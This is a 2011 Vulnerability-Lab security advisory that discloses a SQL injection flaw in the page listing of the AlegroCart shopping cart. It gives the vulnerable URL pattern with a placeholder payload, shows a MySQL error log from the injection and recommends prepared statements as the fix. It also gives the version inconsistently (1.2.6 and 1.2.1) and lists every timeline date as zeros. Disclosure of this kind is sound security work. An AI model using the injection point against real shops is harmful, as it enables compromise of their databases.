Document Title: =============== AlegroCart 1.2.6 - SQL Injection Vulnerability Release Date: ============= 2011-07-19 Vulnerability Laboratory ID (VL-ID): ==================================== 3 Product & Service Introduction: =============================== AlegroCart v1.2.1 is a shop cms what is based on the OpenCart shop engine. * MVC Framework * Modular Design * Supports Custom Addon Modules * Multi-lingual Capability * Worldwide Country Support * Countries and States can be enabled or disabled * Geo Zones for Tax & Shipping * Multiple Tax & Weight Classes * One-Click Currency Updater for all currencies enabled * Automatic Currency update when alternate currency selected. * Template system allows HTML and PHP code. * Multiple Templates Supported. * Separate selectable Styles * NEW Selectable Color Styles * Modular Design Temples allow reuse of tpl modules * Maintenance Mode * SSL Support * Stock Level Control * Ajax Add-to-Cart with Image Animation to Cart * Product Pricing with Options Updated in real time.. * Dynamic Category Menu, CSS and Ajax Driven. * Product Downloads * HomePage Module: display flash or image files and optional text files. * Contains default meta tag information. * Serialized input forms to enhance security. Abstract Advisory Information: ============================== Vulnerability-Lab Team discovers a SQL Injection Vulnerability on AlegroCart what is based on OpenCart. Vulnerability Disclosure Timeline: ================================== 0000-00-00: Verified by Vulnerability-Lab 0000-00-00: Secure Vendor Notification 0000-00-00: Vendor Reply/Feedback 0000-00-00: Fix/Patch Vulnerability 0000-00-00: Discovery by Vulnerability-Lab Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A SQL Injection vulnerability is detected on AlegroCart v1.2.1 on the page listing. An attacker can inject own sql statements over a not secure parsed request. The PageListing allows to compromise the application dbms via a simple sql injection attack. [+] Page Listing Proof of Concept (PoC): ======================= This vulnerability can be exploited by remote attackers ... File: any-article.html Path: /page/-1%27 Example: http://[SERVER]/[PATH]/[ANYFILE].html/page/-[SQL-Statement] References: http://www.xxx.com/demo/hitachi.html/page/-[SQL-Injection] --- Error SQL Log --- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-8, 4' at line 1 Error No: 1064 select * from product p left join product_description pd on (p.product_id = pd.product_id) left join image i on (p.image_id = i.image_id) where pd.language_id = '1' and p.manufacturer_id = '8' and p.date_available < now() and p.status = '1' order by pd.name asc limit -8, 4 Solution - Fix & Patch: ======================= Use a bound parameter via prepared statement to fix the security issue on ths shopping cart application. Security Risk: ============== The security risk of the vulnerability is estimated as high because of pre-auth remote attack technic. Credits & Authors: ================== Vulnerability Research Laboratory Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory